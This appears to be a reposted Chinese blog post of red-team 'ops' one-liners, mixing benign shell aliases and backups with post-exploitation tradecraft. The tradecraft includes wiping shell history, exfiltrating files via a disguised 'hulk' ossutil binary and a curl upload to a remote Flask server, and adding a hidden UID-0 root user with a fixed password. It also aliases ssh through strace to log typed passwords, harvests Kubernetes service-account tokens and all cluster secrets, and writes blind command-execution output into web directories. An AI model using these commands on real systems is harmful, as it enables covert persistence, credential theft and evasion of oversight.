对抗小技巧: 一些实用的运维命令

本来只是打算发几条实用命令，字数太少了干脆从笔记里面随便再捞几条放进来凑数2333

命令补全



1.  `iterm2 + zsh + autosuggestions`

多终端历史命令同步

指定zsh写入的历史命令的路径，配合autosuggestions实用，对设备多的人来说非常实用



1.  `#历史命令的`
    
2.  `HISTFILE="$HOME/Library/Mobile Documents/com~apple~CloudDocs/zsh/.zsh_history"` 
    
3.   `#记录历史命令条数`
    
4.  `HISTSIZE=100000`
    
5.  `SAVEHIST=100000`
    
6.  `setopt appendhistory`

同样的 $HOME/.ssh/， $HOME/.kube/一类的文件夹也可以配置自动同步

隐藏命令记录

入门



1.  `set +o history`

进阶



1.  `export HISTFILE=/dev/null`

高级



1.  `unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0`

清除指定行历史命令

清除540行到566行。



1.  `for h in $(seq 540 566 | tac); do history -d $h; done; history -d $(history 1 | awk '{print $1}')`

代理切换

alias(别名) 非常实用



1.  `alias proxy="export ALL_PROXY=http://127.0.0.1:8080"`
    
2.  `alias noproxy="export https_proxy= http_proxy= all_proxy="`
    
3.  `alias ips="export all_proxy=\"socks5://xxxx:xxxx@proxypool:80\""`

替换jenv:



1.  `alias jdk6="export JAVA_HOME=/Library/Java/JavaVirtualMachines/1.6.0.jdk/Contents/Home"`
    
2.  `alias jdk7="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.7.0_80.jdk/Contents/Home"`
    
3.  `alias jdk8="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_151.jdk/Contents/Home"`
    
4.  `alias jdk9="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-9.0.4.jdk/Contents/Home"`
    
5.  `alias jdk10="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-10.0.2.jdk/Contents/Home"`
    
6.  `alias jdk11="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-11.0.1.jdk/Contents/Home"`
    
7.  `alias jdk12="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-12.0.1.jdk/Contents/Home"`
    
8.  `alias jdk13="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-13.jdk/Contents/Home"`
    
9.  `alias jdk14="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-14.0.1.jdk/Contents/Home"`
    
10.  `alias jdk15="export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk-15.jdk/Contents/Home"`

禁止HOMEBREW自动更新

避免brew安装/更新程序是自动更新其他程序



1.  `export HOMEBREW_NO_AUTO_UPDATE=true`

二进制程序统一管理

所有编译好的工具可以统一丢到这目录，无需在alias去链接程序绝对路径，同样也可以配置iCloud自动同步。



1.  `export PATH=$PATH:/Users/$HOME/tools/bintools/`

当前IP查看

内外网ip



1.  `ip(){`
    
2.    `echo -e "\e[32m[+] 内网:\e[0m"`
    
3.    `ifconfig|grep "inet "|awk -F ' ' '{print $2}'`
    

5.    `echo -e "\n\e[31m[+] 公网:\e[0m"`
    

7.    `curl cip.cc -s | tr -s '\n' '\n'`
    
8.  `}`
    
9.  `ip`

文件备份1



1.  `cd /tmp`
    
2.  `wget https://gosspublic.alicdn.com/ossutil/1.7.13/ossutil64 -O hulk`
    
3.  `chmod +x hulk`
    
4.  `echo "你的配置"|base64 -d > /tmp/.hulk`
    
5.  `./hulk -c /tmp/.hulk cp /hulk.zip oss://xxxx/hulk.zip`
    
6.  `rm -rf /tmp/.hulk`

文件备份2

curl http://xxx:58000/upload -X POST -F 'file=@/tmp/pods'



1.  `➜  ~ cat upload.py`
    
2.  `from flask import Flask, request`
    

4.  `app = Flask(__name__)`
    

6.  `@app.route('/upload', methods=['POST'])`
    
7.  `def upload():`
    
8.      `file = request.files['file']`
    
9.      `if ".." in file.filename:`
    
10.          `return 'fuck u'`
    
11.      `else:`
    
12.          `file.save(file.filename)`
    
13.          `return 'File saved successfully'`
    

16.  `if __name__ == '__main__':`
    
17.      `print("curl http://xxx:58000/upload -X POST -F 'file=@/tmp/pods'")`
    
18.      `app.run(debug=True, host='0.0.0.0', port=58000)`

linux整机备份

备份



1.  `dd if=/dev/vda of=/path/to/backup.img bs=4M`

还原



1.  `dd if=/path/to/backup.img of=/dev/vda bs=4M`

备份到远程



1.  `dd if=/dev/vda bs=4M | gzip -c | ssh root@xxxx "cat > /tmp/xxx_backup.img.gz"`

还原:



1.  `gunzip -c xxx_backup.img.gz > xxx_backup.img`
    
2.  `dd if=xxx_backup.img of=/dev/vda bs=4M`

docker备份



1.  `所有的`
    
2.  `docker ps -a --format "table docker export -o {{.Names}}.tar {{.ID}}"|grep -v NAMES |bash`
    

4.  `仅在允许的`
    
5.  `docker ps --format "table docker export -o {{.Names}}.tar {{.ID}}"|grep -v NAMES |bash`

判断存在指定文件的docker容器



1.  `docker ps -q | xargs docker inspect -f '{{.Name}} {{.State.Running}}' | grep true | cut -c2- | awk '{print "docker exec "$1" [ -f /home/s/www/xxxx.png ] && echo "$1" has this file"}' | sh`
    
2.  `trantor-fe has this file`
    

5.  `docker ps -q | xargs docker inspect -f '{{.Name}} {{.State.Running}}' | grep true | cut -c2- | awk '{print "docker exec "$1" [ -f /lib/ld-musl-x86_64.so.1 ] && echo "$1" has this file"}' | sh`

无netstat看网络连接

单项



1.  `grep -v "rem_address" /proc/net/tcp  | awk 'function hextodec(str,ret,n,i,k,c){`
    
2.      `ret = 0`
    
3.      `n = length(str)`
    
4.      `for (i = 1; i <= n; i++) {`
    
5.          `c = tolower(substr(str, i, 1))`
    
6.          `k = index("123456789abcdef", c)`
    
7.          `ret = ret * 16 + k`
    
8.      `}`
    
9.      `return ret`
    
10.  `} {x=hextodec(substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."hextodec(substr($2,i,2))}{print x":"hextodec(substr($2,index($2,":")+1,4))}'`

双向



1.  `awk 'function hextodec(str,ret,n,i,k,c){`
    
2.      `ret = 0`
    
3.      `n = length(str)`
    
4.      `for (i = 1; i <= n; i++) {`
    
5.          `c = tolower(substr(str, i, 1))`
    
6.          `k = index("123456789abcdef", c)`
    
7.          `ret = ret * 16 + k`
    
8.      `}`
    
9.      `return ret`
    
10.  `}`
    
11.  `function getIP(str,ret){`
    
12.      `ret=hextodec(substr(str,index(str,":")-2,2));`
    
13.      `for (i=5; i>0; i-=2) {`
    
14.          `ret = ret"."hextodec(substr(str,i,2))`
    
15.      `}`
    
16.      `ret = ret":"hextodec(substr(str,index(str,":")+1,4))`
    
17.      `return ret`
    
18.  `}`
    
19.  `NR > 1 {{if(NR==2)print "Local - Remote";local=getIP($2);remote=getIP($3)}{print local" - "remote}}' /proc/net/tcp`

Linux一条命令添加用户



1.  ``useradd -p `openssl passwd -1 -salt 'salt' P@ssw0rd` ibm2 -o -u 0 -g root -G root -s /bin/bash -d /home/guest``

ssh密码备份



1.  ``alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'``

查看sa权限



1.  `cd /run/secrets/kubernetes.io/serviceaccount/`
    

3.  `curl --cacert $PWD/ca.crt --header "Authorization: Bearer $(cat $PWD/token)" -H 'Content-Type: application/json' -i -s -k -X 'POST' --data-binary $'{\"kind\":\"SelfSubjectRulesReview\",\"apiVersion\":\"authorization.k8s.io/v1\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"namespace\":\"default\"},\"status\":{\"resourceRules\":null,\"nonResourceRules\":null,\"incomplete\":false}}' https://$KUBERNETES_SERVICE_HOST:443/apis/authorization.k8s.io/v1/selfsubjectrulesreviews`

etcd备份



1.  `etcdctl --endpoints=http://xxxx:2379 snapshot save sec.db`

k8s备份



1.  `kubectl get namespaces -o name > namespaces.txt`
    
2.  `kubectl get all --namespace=default -o yaml > default-namespace-resources.yaml`
    
3.  `kubectl get clusterroles -o yaml > clusterroles.yaml`
    
4.  `kubectl get clusterrolebindings -o yaml > clusterrolebindings.yaml`
    
5.  `kubectl get deployments --all-namespaces -o yaml > deployments.yaml`
    
6.  `kubectl get configmaps --all-namespaces -o yaml > configmaps.yaml`
    
7.  `kubectl get secrets --all-namespaces -o yaml > secrets.yaml`
    
8.  `kubectl get pods --all-namespaces -o yaml > pods.yaml`
    
9.  `kubectl get serviceaccounts --all-namespaces -o yaml > serviceaccounts.yaml`
    
10.  `kubectl cluster-info dump > cluster-info.log`

查找高权限sa



1.  `kubectl get pods -A -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.spec.serviceAccountName}{"\t"}{.spec.nodeName}{"\n"}{end}'`

kubectl安装



1.  `curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"`
    
2.  `chmod +x ./kubectl`
    
3.  `mv ./kubectl /usr/local/bin/k`
    
4.  `k auth can-i --list`

命令执行不出网



1.  `Windows`
    
2.  `for /f %i in ('dir /s /b e:index.js') do (echo %i> %i.test.txt)%26(ipconfig > %i.ipconfig.txt)"`
    
3.  `linux`
    
4.  `find / -name index.js|while read f;do sh -c 'id;pwd;ifconfig' >$(dirname $f)/test.txt;done`

ssh端口转发



1.  `ssh -L 本地端口:目标主机:目标端口 uesr@host [-N]`
    
2.  `ssh -L 5432:192.168.60.110:5432 sysadm@192.168.60.110 -p 2222`

长亭百川云 - 文章详情

长亭百川云